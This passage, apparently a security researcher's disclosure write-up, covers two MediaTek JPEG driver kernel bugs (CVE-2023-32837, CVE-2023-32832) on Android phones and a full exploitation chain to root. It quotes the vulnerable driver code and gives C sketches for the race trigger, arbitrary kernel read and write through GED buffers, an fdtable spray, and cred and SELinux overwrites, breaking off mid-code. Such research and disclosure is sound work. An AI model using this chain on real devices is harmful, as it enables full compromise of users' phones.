Another useful resource is the SELinux policy itself. Userland interacts with the drivers via a fairly typical set of VFS operations, so the SELinux policy must encapsulate the necessary permissions to perform those operations. As a result, the SELinux policy generally reflects what the developers intend to be accessible from an untrusted context. Analysis of the policy can lead to the discovery of certain oddities and idiosyncrasies in the accessibility of certain drivers. For example, occasionally a file may not be directly openable via the filesystem, but there may be some alternative method by which an app can ask another, more privileged process to open the file on its behalf and hand the associated fd back, after which the app is allowed to read/write/ioctl to the fd itself. One example of this behavior would be the EdgeTPU device on the Pixel 7:

Additional research suggests that untrusted_app can ask a privileged process for access to the EdgeTPU driver fd itself if the requesting app is on an allowlist of certain applications.

These surveys strongly imply that the GPU driver is the most consistently accessible driver from an untrusted application, which is expected. On the Google Pixel 7, I did not find much else that was accessible from an entirely unprivileged context. Nevertheless, inspired by previous similar efforts on hardware like Samsung's NPU, I performed research on the EdgeTPU driver, Google's tensor processing unit for doing ML-related tasks on the Pixel series of devices. This resulted in the discovery of one significant issue: a race condition when registering memory with the EdgeTPU driver while VMAs are concurrently being modified.

Unlike the Pixel 7, the MediaTek chipset phones (Asus ROG 6D and Xiaomi 11T) contained several different drivers that could be accessed from unprivileged userland:

  • /proc/ged
  • /proc/mtk_jpeg
  • /proc/perfmgr/[eara_ioctl,eas_ioctl,perf_ioctl,xgff_ioctl]

These drivers represent significantly more interesting and complex attack surfaces than what was available on the Pixel 7 device. The ged driver contained numerous interesting and valuable exploitation primitives that we'll discuss in detail a bit later. While the perfmgr driver presented several attack surfaces, I wasn't able to find any security-relevant bugs. The mtk_jpeg driver, however, yielded significant fruit that deserves a closer look.

MediaTek JPEG Decoding Accelerator

The mtk_jpeg driver manages specialized hardware on MediaTek devices that performs JPEG decoding acceleration. Linux kernel documentation notes that “Mediatek JPEG Decoder is the JPEG decode hardware present in Mediatek SoCs”. More relevantly, from an attacker's point of view, this driver can be accessed (at least on the phones assessed) from the untrusted_app context (although curiously, it cannot be accessed from an unprivileged adb debugging context). This JPEG decoding accelerator and its associated driver are present on both the Xiaomi 11T and the Asus ROG 6D. However, based on open-source codebases for these different devices' kernels, it appears MediaTek is actively maintaining several different trees for this driver, likely based on the associated kernel version, and these two devices use separate trees.

I found two vulnerabilities in this driver. CVE-2023-32837 was a textbook OOB read/write in an array of structs. Various different members of the struct were accessed and modified, creating several different possibilities for exploitation, but also making exploitation significantly more challenging. Interestingly, MediaTek partially fixed this bug in July 2021, although the exact date this patch went out to OEMs is unclear. From the commit message, it's clear that MediaTek detected this issue with the Coverity static analysis tool, but it appears unlikely that the security impact was identified. Regardless, while the issue was fixed in some of the MediaTek kernel trees, it went unpatched in other versions of that same driver. This meant that while the Asus ROG 6D (running kernel 5.10) had received the patch for this vulnerability, the (otherwise fully patched and security-supported) Xiaomi 11T (running 4.14) had not.

Some background knowledge on how the jpeg driver works eases discussion of the other issue, CVE-2023-32832. The accelerator hardware has two separate “cores” that can perform JPEG decoding. When a process requests JPEG decoding work to be performed, it calls the ioctl JPEG_DEC_IOCTL_HYBRID_START, and the kernel decides which decoding core will perform that work inside of jpeg_drv_hybrid_dec_lock():

static int jpeg_drv_hybrid_dec_lock(int *hwid)
{
        int retValue = 0;
        int id = 0;
        ...
        mutex_lock(&jpeg_hybrid_dec_lock);
        for (id = 0; id < HW_CORE_NUMBER; id++) {
                if (dec_hwlocked[id]) {
                        JPEG_LOG(1, "jpeg dec HW core %d is busy", id);
                        continue;
                } else {
                        *hwid = id;
                        dec_hwlocked[id] = true;
                        JPEG_LOG(1, "jpeg dec get %d HW core", id);
                        _jpeg_hybrid_dec_int_status[id] = 0;
                        jpeg_drv_hybrid_dec_power_on(id);
                        enable_irq(gJpegqDev.hybriddecIrqId[id]);
                        break;
                }
        }
        mutex_unlock(&jpeg_hybrid_dec_lock);
        if (id == HW_CORE_NUMBER) {
                JPEG_LOG(1, "jpeg dec HW core all busy");
                *hwid = -1;
                retValue = -EBUSY;
        }
        return retValue;
}

The array dec_hwlocked contains a boolean element for each core: true for locked cores and false for unlocked cores. This array is protected with a mutex to prevent concurrent calls to jpeg_drv_hybrid_dec_lock or jpeg_drv_hybrid_dec_unlock from racing with each other. After locking the core, jpeg_drv_hybrid_dec_start sets up the data structures to be utilized for the decoding operation:

switch (cmd) {
        case JPEG_DEC_IOCTL_HYBRID_START:
                if (copy_from_user(
                        &taskParams, (void *)arg,
                        sizeof(struct JPEG_DEC_DRV_HYBRID_TASK))) {
                        return -EFAULT;
                }
                ...
                if (jpeg_drv_hybrid_dec_lock(&hwid) == 0) {
                        *pStatus = JPEG_DEC_PROCESS;
                } else {
                        JPEG_LOG(1, "jpeg_drv_hybrid_dec_lock failed (hw busy)");
                        return -EBUSY;
                }
                if (jpeg_drv_hybrid_dec_start(taskParams.data, hwid, &index_buf_fd) == 0) {
                        ...
                } else {
                        JPEG_LOG(0, "jpeg_drv_dec_hybrid_start failed");
                        jpeg_drv_hybrid_dec_unlock(hwid);
                        return -EFAULT;
                }
                break;
...
}

static int jpeg_drv_hybrid_dec_start(unsigned int data[], unsigned int id, int *index_buf_fd)
{
        u64 ibuf_iova, obuf_iova;
        int ret;
        void *ptr;
        unsigned int node_id;

        JPEG_LOG(1, "+ id:%d", id);
        ret = 0;
        ibuf_iova = 0;
        obuf_iova = 0;
        node_id = id / 2;

        bufInfo[id].o_dbuf = jpg_dmabuf_alloc(data[20], 128, 0);
        bufInfo[id].o_attach = NULL;
        bufInfo[id].o_sgt = NULL;

        bufInfo[id].i_dbuf = jpg_dmabuf_get(data[7]);
        bufInfo[id].i_attach = NULL;
        bufInfo[id].i_sgt = NULL;

        if (!bufInfo[id].o_dbuf) {
                JPEG_LOG(0, "o_dbuf alloc failed");
                return -1;
        }
        if (!bufInfo[id].i_dbuf) {
                JPEG_LOG(0, "i_dbuf null error");
                return -1;
        }

        ret = jpg_dmabuf_get_iova(bufInfo[id].o_dbuf, &obuf_iova, gJpegqDev.pDev[node_id], &bufInfo[id].o_attach, &bufInfo[id].o_sgt);
        JPEG_LOG(1, "obuf_iova:0x%llx lsb:0x%lx msb:0x%lx", obuf_iova,
                (unsigned long)(unsigned char*)obuf_iova,
                (unsigned long)(unsigned char*)(obuf_iova>>32));

        ptr = jpg_dmabuf_vmap(bufInfo[id].o_dbuf);
        if (ptr != NULL && data[20] > 0)
                memset(ptr, 0, data[20]);
        jpg_dmabuf_vunmap(bufInfo[id].o_dbuf, ptr);

        jpg_get_dmabuf(bufInfo[id].o_dbuf);
        // get obuf for adding reference count, avoid early release in userspace.
        *index_buf_fd = jpg_dmabuf_fd(bufInfo[id].o_dbuf);

        ret = jpg_dmabuf_get_iova(bufInfo[id].i_dbuf, &ibuf_iova, gJpegqDev.pDev[node_id], &bufInfo[id].i_attach, &bufInfo[id].i_sgt);
        JPEG_LOG(1, "ibuf_iova 0x%llx lsb:0x%lx msb:0x%lx", ibuf_iova,
                (unsigned long)(unsigned char*)ibuf_iova,
                (unsigned long)(unsigned char*)(ibuf_iova>>32));

        if (ret != 0) {
                JPEG_LOG(0, "get iova fail i:0x%llx o:0x%llx", ibuf_iova, obuf_iova);
                return ret;
        }
        ...
        return ret;
}

Finally, an ioctl call to JPEG_DEC_IOCTL_HYBRID_WAIT (which calls jpeg_drv_hybrid_dec_unlock) frees the resources associated with the core and releases the core back to be used in future operations.

case JPEG_DEC_IOCTL_HYBRID_WAIT:
                ...
                if (copy_from_user(
                        &pnsParmas, (void *)arg,
                        sizeof(struct JPEG_DEC_DRV_HYBRID_P_N_S))) {
                        JPEG_LOG(0, "Copy from user error");
                        return -EFAULT;
                }
                /* set timeout */
                timeout_jiff = msecs_to_jiffies(3000);
                JPEG_LOG(1, "JPEG Hybrid Decoder Wait Resume Time: %ld",
                                timeout_jiff);
                hwid = pnsParmas.hwid;
                if (hwid < 0 || hwid >= HW_CORE_NUMBER) { // In other versions of the driver, this >= check was omitted, which led to several different OOB accesses later, aka CVE-2023-32837
                        JPEG_LOG(0, "get hybrid dec id failed");
                        return -EFAULT;
                }
                if (!dec_hwlocked[hwid]) {
                        JPEG_LOG(0, "wait on unlock core %d\n", hwid);
                        return -EFAULT;
                }
                if (jpeg_isr_hybrid_dec_lisr(hwid) < 0) {
                        long ret = 0;
                        int waitfailcnt = 0;
                        do {
                                ret = wait_event_interruptible_timeout(
                                        hybrid_dec_wait_queue[hwid],
                                        _jpeg_hybrid_dec_int_status[hwid],
                                        timeout_jiff);
                                ...
                                if (ret < 0) {
                                        waitfailcnt++;
                                        usleep_range(10000, 20000);
                                }
                        } while (ret < 0 && waitfailcnt < 500);
                }
                ...
                if (copy_to_user(pnsParmas.progress_n_status, &progress_n_status, sizeof(int))) {
                        return -EFAULT;
                }
                ...
                jpeg_drv_hybrid_dec_unlock(hwid);
                break;
                ...
}

...

static void jpeg_drv_hybrid_dec_unlock(unsigned int hwid)
{
        mutex_lock(&jpeg_hybrid_dec_lock);
        if (!dec_hwlocked[hwid]) {
                JPEG_LOG(0, "try to unlock a free core %d", hwid);
        } else {
                dec_hwlocked[hwid] = false;
                JPEG_LOG(1, "jpeg dec HW core %d is unlocked", hwid);
                jpeg_drv_hybrid_dec_power_off(hwid);
                disable_irq(gJpegqDev.hybriddecIrqId[hwid]);
                jpg_dmabuf_free_iova(bufInfo[hwid].i_dbuf,
                        bufInfo[hwid].i_attach,
                        bufInfo[hwid].i_sgt);
                jpg_dmabuf_free_iova(bufInfo[hwid].o_dbuf,
                        bufInfo[hwid].o_attach,
                        bufInfo[hwid].o_sgt);
                jpg_dmabuf_put(bufInfo[hwid].i_dbuf);
                jpg_dmabuf_put(bufInfo[hwid].o_dbuf);
                // we manually add 1 ref count, need to put it.
        }
        mutex_unlock(&jpeg_hybrid_dec_lock);
}

jpeg_drv_hybrid_dec_unlock is also called in the event that jpeg_drv_hybrid_dec_start fails.

While the jpeg_hybrid_dec_lock mutex protects the direct core locking and unlocking, it does not protect the body of the jpeg_drv_hybrid_dec_start function. This means that while there cannot be concurrent calls to both jpeg_drv_hybrid_dec_lock and jpeg_drv_hybrid_dec_unlock, there can be concurrent calls to jpeg_drv_hybrid_dec_start and jpeg_drv_hybrid_dec_unlock which in practice is just as bad, as these two functions racily access the same global data structure bufInfo.

One small added complication for this bug is that, in order to reach jpeg_drv_hybrid_dec_unlock in the JPEG_DEC_IOCTL_HYBRID_WAIT call, the core must already be locked when the wait begins, because the handler checks that the core is locked before attempting to wait on it.

An example of this race in practice with two processes A and B would be:

Process A: Calls ioctl JPEG_DEC_IOCTL_HYBRID_START, which locks core 0 with jpeg_drv_hybrid_dec_lock and enters jpeg_drv_hybrid_dec_start.

Process B: Calls ioctl JPEG_DEC_IOCTL_HYBRID_WAIT, which confirms that core 0 is locked, then begins a 3-second wait for the core to send an interrupt denoting completion of the decoding request.

Process A: Fails jpeg_drv_hybrid_dec_start (after initializing some of the data structures), calls jpeg_drv_hybrid_dec_unlock on core 0, freeing any allocated resources, and returns to userland.

[wait ~3 seconds]

Process A: Calls ioctl JPEG_DEC_IOCTL_HYBRID_START again, which locks core 0 with jpeg_drv_hybrid_dec_lock and enters jpeg_drv_hybrid_dec_start.

Process B: The 3-second wait times out, and the JPEG_DEC_IOCTL_HYBRID_WAIT ioctl call unlocks core 0 with jpeg_drv_hybrid_dec_unlock.

[Process A and B are now concurrently initializing and freeing the same data structures]

This can lead to a variety of use-after-free or double free conditions, depending on how process A and B race.
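A sketch of how this interleaving could be driven from userland is shown below. The ioctl request codes and argument structs are placeholders standing in for MediaTek's real driver definitions, and the timing is approximate; an actual exploit would loop until the race is won:

// Illustrative only: exercise the START/WAIT interleaving described above.
// JPEG_DEC_IOCTL_* values and the argument structs are placeholders for
// the real definitions in the MediaTek driver headers.
#include <pthread.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define JPEG_DEC_IOCTL_HYBRID_START 0xc0544a01 /* placeholder */
#define JPEG_DEC_IOCTL_HYBRID_WAIT  0xc0544a02 /* placeholder */

struct hybrid_task { unsigned int data[21]; };            /* placeholder */
struct hybrid_pns  { int hwid; int *progress_n_status; }; /* placeholder */

static int jpeg_fd;

static void *thread_a(void *arg) /* stands in for "Process A" */
{
    struct hybrid_task t = {0};
    t.data[7] = -1; /* bogus dmabuf fd: jpeg_drv_hybrid_dec_start fails and
                       the handler unlocks core 0 via the error path */
    ioctl(jpeg_fd, JPEG_DEC_IOCTL_HYBRID_START, &t); /* lock, fail, unlock */
    sleep(3);                                        /* let B's wait expire */
    ioctl(jpeg_fd, JPEG_DEC_IOCTL_HYBRID_START, &t); /* re-enter dec_start,
                       racing with B's timed-out unlock of the same core */
    return NULL;
}

static void *thread_b(void *arg) /* stands in for "Process B" */
{
    int status = 0;
    struct hybrid_pns p = { .hwid = 0, .progress_n_status = &status };
    /* Passes the "is core 0 locked" check, then sits in
       wait_event_interruptible_timeout for ~3 seconds before unlocking. */
    ioctl(jpeg_fd, JPEG_DEC_IOCTL_HYBRID_WAIT, &p);
    return NULL;
}

int main(void)
{
    jpeg_fd = open("/proc/mtk_jpeg", O_RDONLY);
    pthread_t a, b;
    pthread_create(&a, NULL, thread_a, NULL);
    usleep(1000); /* let A grab core 0 before B checks the lock */
    pthread_create(&b, NULL, thread_b, NULL);
    pthread_join(a, NULL);
    pthread_join(b, NULL);
    return 0;
}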

The Journey to root

The next step was to try to exploit these issues. My first attempt targeted the OOB write issue, CVE-2023-32837. I was able to develop the primitive from an uncontrolled OOB read/write in the kernel .data region into a racy write of null bytes at a predetermined offset in a kernel task stack used by an attacker-controlled process. At this point it was possible to overwrite a kernel stack entry with nulls during any syscall which felt to me like enough flexibility to create a full exploit. However, despite my best efforts (including the creation of a tool to find where in an arbitrary backtrace the write would occur), I was unable to discover a technique to create a better primitive from this write.

Failing that effort, I decided to take a look at the other issue in the same driver, CVE-2023-32832. During the freeing step that races with jpeg_drv_hybrid_dec_start, jpeg_drv_hybrid_dec_unlock drops access to four separate resources:

jpg_dmabuf_free_iova(bufInfo[hwid].i_dbuf, bufInfo[hwid].i_attach, bufInfo[hwid].i_sgt); // The input buffer's virtual address mapping in the core
jpg_dmabuf_free_iova(bufInfo[hwid].o_dbuf, bufInfo[hwid].o_attach, bufInfo[hwid].o_sgt); // The output buffer's virtual address mapping in the core
jpg_dmabuf_put(bufInfo[hwid].i_dbuf); // The input buffer file's refcount is decremented. This buffer was previously allocated by the attacker and is associated with a file descriptor.
jpg_dmabuf_put(bufInfo[hwid].o_dbuf); // The output buffer file's refcount is decremented. This buffer was previously allocated during jpeg_drv_hybrid_dec_start.

One critical behavior of the driver that enhanced exploitability was that although jpeg_drv_hybrid_dec_unlock properly drops the refcounts of i_dbuf and o_dbuf, it does not reinitialize those entries in the bufInfo global array to NULL. As it relates to the race, this means that if Process B’s racy jpeg_drv_hybrid_dec_unlock occurs before Process A’s second jpeg_drv_hybrid_dec_start reinitializes i_dbuf and o_dbuf, an extra refcount of i_dbuf and o_dbuf will be released. Since i_dbuf and o_dbuf are struct file*’s, this can lead directly to a struct file UAF. As the i_dbuf struct file comes directly from a dmabuf file descriptor passed into jpeg_drv_hybrid_dec_start, this leads to a dangling file descriptor with the struct file freed from underneath it. This is undoubtedly an exploitable bug.

There are several different techniques for exploiting a dangling file descriptor. One widely used strategy is causing the backing slab page of the struct file to be freed and returned back to the page allocator, then reallocating that page with pipe buffer data pages in order to gain attacker control over the memory used for the struct file. Another well-known strategy would be to utilize the cross-cache technique to reallocate the memory as a different kind of kmalloc slab/object. However, in the future both of these techniques may be remediated if the SLAB_VIRTUAL mitigation comes into effect in the mainline Linux kernel. In the interest of exploring the future of Android kernel hacking, I sought a novel exploitation technique which did not involve cross-cache or slab-cache->page allocator heap shaping techniques.

Some Other Novel Exploitation Technique

One of the most common UAF exploit techniques involves reallocating the first-order freed object with a new object of a different type, creating a type-confusion condition which leads to an improved memory corruption primitive. However the only type of object that can be allocated in a page designated for the struct file cache is the struct file type, so the options for creating a type confusion memory corruption condition using first-order object reclamation are limited. However, just because an object is freed does not preclude it from being usable under limited circumstances. When the kernel inserts an object onto a freelist, this clobbers the middle of the object. The rest of the object however, remains in whatever state it was in at the moment it was freed, including pointers and any other member variables. Those stale pointers can (and in practice often do) point to other freed objects which may be allocated from a different slab cache entirely, potentially including the generic kmalloc slab-caches. Note that under the C-ism where pointers are set to NULL after freeing, these stale pointers wouldn’t exist. However as the memory containing the pointer is getting freed anyway, setting these pointers to NULL is often seen as unnecessarily conservative (and in fact, C compilers often throw away writes to objects that are about to be freed).
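The shape of this situation can be illustrated with a small userspace analogy (heap metadata placement is allocator-specific, so treat this as conceptual rather than a faithful model of the kernel slab allocator):

/* Userspace analogy of second-order stale pointers. Freeing the parent
 * clobbers only a small header region, so its interior pointer to an
 * already-freed child survives and aliases whatever reclaims the child. */
#include <stdio.h>
#include <stdlib.h>

struct child  { long secret; };
struct parent {
    long header[4];        /* region an allocator may clobber on free */
    struct child *child;   /* interior pointer that can survive the free */
};

int main(void)
{
    struct parent *p = malloc(sizeof(*p));
    p->child = malloc(sizeof(struct child));
    p->child->secret = 0x41414141;

    struct parent *stale = p; /* analog of the dangling file descriptor */
    free(p->child);           /* second-order child freed... */
    free(p);                  /* ...then the first-order parent; no NULLing */

    /* Reclaim the child's slot as a "different type" of the same size. */
    long *reclaimer = malloc(sizeof(struct child));
    *reclaimer = 0x13371337;

    /* Using the freed parent implicitly accesses the reclaimed child:
       on common allocators this prints the reclaimer's value. */
    printf("type-confused read: 0x%lx\n", stale->child->secret);
    return 0;
}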

By continuing to use this freed first-order object, we can implicitly access freed second-order child objects. By reclaiming those objects, we can recreate a type-confusion memory corruption primitive, taking advantage of how the methods called on the first-order freed object implicitly access the second-order child object. Let’s see how we can apply this to our specific scenario.

Linux kernel struct files may represent many different types of files depending on the kind of opened file such as ext4 files, procfs files, or even MediaTek JPEG decoding driver files. In order to represent all of these different types while also maintaining some commonality of structure for the universally needed members of an opened file, struct file contains a private_data member which references any type-specific data needed.

As mentioned previously, the UAF’d struct file in this case is a dmabuf file. This means the private_data pointer points to a struct dma_buf object. The dma_buf object lifetime is implicitly tied to the lifetime of the associated dmabuf file struct. When the dmabuf struct file is freed, the dma_buf object is freed too. However unlike the struct file, dma_buf objects are allocated from the generic kmalloc slab caches. This means that the dma_buf can be reclaimed with a different type object that comes from the same generic kmalloc slab cache.

After a hypothetical reclamation by a new object, this new object can still be UAF referenced as a dma_buf through the freed but still very usable dmabuf struct file that itself is referenced via the dangling file descriptor! Thus we arrive at the following strategy:

  1. Free the file by using our race condition bug to drop an extra reference on i_dbuf (which also frees the dma_buf), leaving a dangling fd pointing to a freed struct file which still has a stale pointer to a freed dma_buf
  2. Reclaim the dma_buf WITHOUT reclaiming the struct file
  3. Call dma_buf operations on the dangling fd

You may have astutely noted by this point that this strategy relies on a freed object (that is, the struct file) not being reclaimed as another object by the heap allocator. This is absolutely correct, and one would expect that in an exploit where exceptional reliability is a priority, it may be necessary to perform some heap shaping in order to bury this freed struct file deeply in the allocator freelists. In practice (and in my exploit), the freed struct file will rarely be on the percpu active slab so it’s unlikely to get reclaimed immediately, and my exploit generally runs fast enough that it doesn’t matter.

At this point we now need to determine what object to use in order to reclaim the freed dma_buf, as well as what operation to call on the freed dma_buf file/object to develop a stronger primitive. I ended up finding the solutions to both of these problems in the GED driver.

The GED driver

The GED (GPU Extension Device) driver is a MediaTek-specific interface that provides userland with several supplementary GPU features, primarily for tuning purposes. Two of its “features” appeared particularly valuable. Feature number one, GED GE Buffers, presented a truly remarkable heap spray and reclamation primitive. This feature provides several requisite characteristics of a suitable heap spray primitive:

  • Allocates buffers of a controlled size without causing undue noise for the rest of the heap.
  • Buffer data is fully attacker controlled, with no uncontrolled header at the beginning.
  • Buffers can be freed at any time.

One standout characteristic that elevates this heap spray primitive above many of its peers however, is that even once allocated, the attacker can read and write to these buffers at will while keeping the buffer allocated. This is about as powerful a heap spray primitive as one could imagine. By reclaiming the UAF’d dma_buf struct with a GED GE buffer, we gain fully deterministic read/write over the dma_buf struct, including any pointers contained therein.

Graph showing the overlapping object hierarchy of a UAF'd dma buffer struct file and a GE file

Feature number two is an alternate codepath to the same functionality as the DMA_BUF_SET_NAME ioctl, which is (very sensibly) used to set the name of a dma_buf. The biggest difference between these paths is the GED codepath’s lack of SELinux inode checks on the underlying dma_buf fd. These inode checks would normally crash the kernel when they run on a freed struct file - however because of the GED codepath, we can skip this inode check, and change the dma_buf’s name despite running on a freed dma_buf file! Normally, this code would free the pointer to the previous name within the dma_buf struct and allocate a new buffer for the name string. However, because of GED GE buffers we are able to control the entirety of the dma_buf struct. By combining these primitives, we can kfree an arbitrary pointer before setting a new name string.

long mtk_dma_buf_set_name(struct dma_buf *dmabuf, const char *buf)
{
        char *name = kstrndup(buf, DMA_BUF_NAME_LEN, GFP_KERNEL);
        ...
        kfree(dmabuf->name); // dmabuf is attacker controlled
        dmabuf->name = name; // the name pointer is written to attacker-controlled memory
        ...
}

Achieving arbitrary read

Innocuous dmabuf file operations become potent primitives now that we have precise control of the dma_buf struct. For example, this is the code backing /proc/pid/fdinfo/n for dmabuf files:

static void dma_buf_show_fdinfo(struct seq_file *m, struct file *file)
{
        struct dma_buf *dmabuf = file->private_data;

        seq_printf(m, "size:\t%zu\n", dmabuf->size);
        /* Don't count the temporary reference taken inside procfs seq_show */
        seq_printf(m, "count:\t%ld\n", file_count(dmabuf->file) - 1);
        seq_printf(m, "exp_name:\t%s\n", dmabuf->exp_name);
        spin_lock(&dmabuf->name_lock);
        if (dmabuf->name)
                seq_printf(m, "name:\t%s\n", dmabuf->name);
        spin_unlock(&dmabuf->name_lock);
}

There are several opportunities in this function for achieving arbitrary read, but the cleanest one is the file_count() call, which will dereference the passed pointer plus a hardcoded offset, and print the read 8-byte value as a signed long. Normally in the context of this C function, file == ((struct dma_buf*) file->private_data)->file, but since we control the dma_buf struct, that isn't necessarily the case.
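Under those assumptions, driving the primitive from userspace could look roughly like the following. ge_buffer_write() is a hypothetical wrapper around the GE buffer editing primitive described earlier, and the two offsets are placeholders for values recovered from the target kernel:

/* Sketch: turn dma_buf_show_fdinfo() into an arbitrary kernel read.
 * ge_buffer_write() is a hypothetical wrapper that edits the reclaimed
 * fake dma_buf in place via the overlapping GED GE buffer. */
#include <stdio.h>
#include <stdint.h>

void ge_buffer_write(size_t off, const void *src, size_t len); /* hypothetical */

#define DMA_BUF_FILE_OFF 0x20 /* placeholder: offsetof(struct dma_buf, file) */
#define FILE_F_COUNT_OFF 0x38 /* placeholder: offsetof(struct file, f_count) */

uint64_t kread64(int dangling_fd, uint64_t kaddr)
{
    /* Point the fake dma_buf's ->file at (kaddr - f_count offset) so that
       file_count() in dma_buf_show_fdinfo() dereferences exactly kaddr. */
    uint64_t fake_file = kaddr - FILE_F_COUNT_OFF;
    ge_buffer_write(DMA_BUF_FILE_OFF, &fake_file, sizeof(fake_file));

    char path[64], line[256];
    long val = 0;
    snprintf(path, sizeof(path), "/proc/self/fdinfo/%d", dangling_fd);
    FILE *f = fopen(path, "r");
    if (!f)
        return 0;
    while (fgets(line, sizeof(line), f))
        if (sscanf(line, "count:\t%ld", &val) == 1)
            break;
    fclose(f);
    return (uint64_t)(val + 1); /* fdinfo printed file_count(...) - 1 */
}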

Achieving arbitrary write

At this point we have three powerful primitives:

  • Read/write UAF’d dma_buf struct memory (via GED GE buffers)
  • Arbitrary read (via dma_buf_show_fdinfo)
  • Arbitrary free (via ged_dmabuf_set_name)

Graph showing our arbitrary read and arbitrary free primitives via the UAF'd dma buffer

There are many potential strategies that use these primitives to achieve an arbitrary write primitive. The technique I chose was to type-confuse a GE buffer with a GE buffer array. GED GE Buffers are tracked through a hierarchy of structs and arrays. A GE file’s private_data member points to an array of GE buffer pointers like so:

Graph showing the object hierarchy of GE files within an fdtable down to GE buffers

I achieve this type-confusion by using the arbitrary-free primitive developed previously to free a GE buffer array, then reclaiming that array with a GE buffer from a second GE file. Since the GE buffer array (and GE buffers as well) come from generic kmalloc caches, the only requirement for this reclamation is allocating GE buffers that are the same size as a GE buffer array. If two GE files are referencing the same memory, one (GE file A) as a GE buffer, and one (GE file B) as a GE buffer array, I can modify the contents of a GE buffer array at will.

Graph showing the overlapping object hierarchy of two GE files where one file's GE buffer is another file's GE buffer array

Then performing an arbitrary write to a virtual address X will be as simple as using GE file A’s GE buffer to change the contents of the array to point to the virtual address X, then writing to that address using GE file B which now thinks virtual address X is a GE buffer!
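Sketched as code (ge_write() is a hypothetical wrapper around the GED GE buffer write ioctl; after the reclamation above, buffer 0 of GE file A overlaps GE file B's buffer pointer array):

/* Sketch: arbitrary write via two GE files viewing the same memory. */
#include <stddef.h>
#include <stdint.h>

void ge_write(int ge_fd, int buf_idx, size_t off,
              const void *src, size_t len); /* hypothetical wrapper */

void write64(int ge_fd_a, int ge_fd_b, uint64_t kaddr, uint64_t value)
{
    /* Through file A, overwrite entry 0 of file B's GE buffer array so
       that B now believes kaddr is one of its GE buffers... */
    ge_write(ge_fd_a, 0, 0, &kaddr, sizeof(kaddr));

    /* ...then write through file B; the data lands at kaddr. */
    ge_write(ge_fd_b, 0, 0, &value, sizeof(value));
}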

This technique hinges on being able to use the arbitrary free primitive to free a GE buffer array. To do that, it’s necessary to find the virtual address of a GE buffer array first. Since we have an arbitrary read primitive already, any parent struct/object/array of a GE buffer array will be enough to find the virtual address of a GE buffer array itself. The hierarchy is as follows:

  1. GE arrays are referenced by a GE file
  2. GE files are referenced by an fdtable as a file descriptor
  3. An fdtable is referenced by a task struct
  4. Task structs are referenced as part of the task list with the root node being the init task in the kernel image

The fdtable represents an attractive object to find, as it comes out of the same generic kmalloc cache as dma_buf name strings. We can find a dma_buf name string’s virtual address by using dma_buf_set_name (which we also use as our arbitrary free primitive) to insert a pointer to a dma_buf name string into the reclaimed UAF’d dma_buf object that is now a GE buffer. We then simply read it out of our GE buffer, free that dma_buf name string (again using dma_buf_set_name), and reclaim it with an fdtable. Creating fdtables is fairly easy - we simply fork many processes ahead of time that share an fdtable, then unshare(2) the fdtable at the appropriate time to allocate new fdtables. The full exploit strategy is as follows:

  1. Trigger a dangling fd of a dmabuf file using our mtk-jpeg race condition bug
  2. Reclaim the underlying dma_buf leaving the parent dmabuf file free (but still referenced by a dangling file descriptor)
  3. Use ged_dmabuf_set_name on our dangling file to place a new name pointer in the fake dma_buf struct
  4. Read the fake dma_buf struct (which is really a GE buffer) to get the name pointer
  5. Free the name pointer by calling ged_dmabuf_set_name again
  6. Reclaim the name pointer as an fdtable with references to a GE fd with an array of GE buffers
  7. Use the arbitrary read to find the GE buffer array
  8. Use the arbitrary free to free the GE buffer array
  9. Reclaim the GE buffer array with another GE buffer

At the end of this process we’ll have a reliable arbitrary read/write!
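One step worth sketching is the fdtable spray from step 6: children created with CLONE_FILES share the parent's fdtable, so the allocation of a fresh fdtable is deferred until each child calls unshare(2), at the moment we want to reclaim the freed chunk. A rough sketch (tuning the number of open fds so the fdtable lands in the right kmalloc size class is omitted):

/* Sketch: pre-spawn workers that share our fdtable (CLONE_FILES), then
 * allocate fresh fdtables on demand with unshare(2) to reclaim a freed
 * kmalloc chunk as an fdtable. */
#define _GNU_SOURCE
#include <sched.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>

#define STACK_SZ (64 * 1024)
#define WORKERS  16

static volatile sig_atomic_t go;
static void on_sigusr1(int sig) { (void)sig; go = 1; }

static int worker(void *arg)
{
    (void)arg;
    signal(SIGUSR1, on_sigusr1);
    while (!go)
        pause();                 /* wait until the target chunk is freed */
    unshare(CLONE_FILES);        /* now: allocates a brand-new fdtable */
    pause();                     /* keep the fdtable alive */
    return 0;
}

int main(void)
{
    pid_t pids[WORKERS];
    for (int i = 0; i < WORKERS; i++) {
        char *stack = malloc(STACK_SZ);
        /* CLONE_FILES: child shares our fdtable, so no new fdtable is
           allocated yet; allocation is deferred until the unshare(). */
        pids[i] = clone(worker, stack + STACK_SZ,
                        CLONE_FILES | SIGCHLD, NULL);
    }
    /* ... free the dma_buf name string here via ged_dmabuf_set_name ... */
    for (int i = 0; i < WORKERS; i++)
        kill(pids[i], SIGUSR1);  /* spray fdtables over the freed chunk */
    pause();
    return 0;
}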

Getting a root shell

As a fun exercise, I decided to see how easy it was to disable SELinux and get root after achieving arbitrary read/write. Various manufacturers may implement certain tripping hazards to slow down exploit development efforts, but in my case (Asus ROG 6D), there were no hoops I needed to jump through at all. It was enough to simply write 0 to the uid/gid of my process’s cred struct to achieve root, and write 0 to the selinux_enforcing bit to turn off SELinux. After this I just execlp(“/system/bin/sh”,...) and out pops a root shell!

Getting root on an Android device with the exploit
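A sketch of those finishing steps, assuming kread64()/kwrite64() wrappers built from the primitives above; the offsets and the selinux_enforcing address are placeholders for values recovered from the target kernel image, and locating your own task_struct (e.g., by walking the task list from the init task) is omitted:

/* Sketch of the final step: zero our cred's ids and selinux_enforcing.
 * All offsets/addresses are placeholders for target-specific values;
 * kread64()/kwrite64() are the primitives built above. */
#include <stdint.h>
#include <unistd.h>

uint64_t kread64(uint64_t kaddr);            /* from the read primitive */
void kwrite64(uint64_t kaddr, uint64_t val); /* from the write primitive */

#define TASK_CRED_OFF     0x7a0 /* placeholder: offsetof(task_struct, cred) */
#define CRED_UID_OFF      0x04  /* placeholder: offsetof(cred, uid) */
#define SELINUX_ENFORCING 0xffffffc011223344UL /* placeholder address */

void get_root(uint64_t own_task)
{
    uint64_t cred = kread64(own_task + TASK_CRED_OFF);

    /* uid..fsgid are eight consecutive 32-bit ids in struct cred;
       zero all 32 bytes with four 8-byte writes. */
    for (int i = 0; i < 4; i++)
        kwrite64(cred + CRED_UID_OFF + 8 * i, 0);

    kwrite64(SELINUX_ENFORCING, 0); /* also zeroes 4 adjacent bytes */

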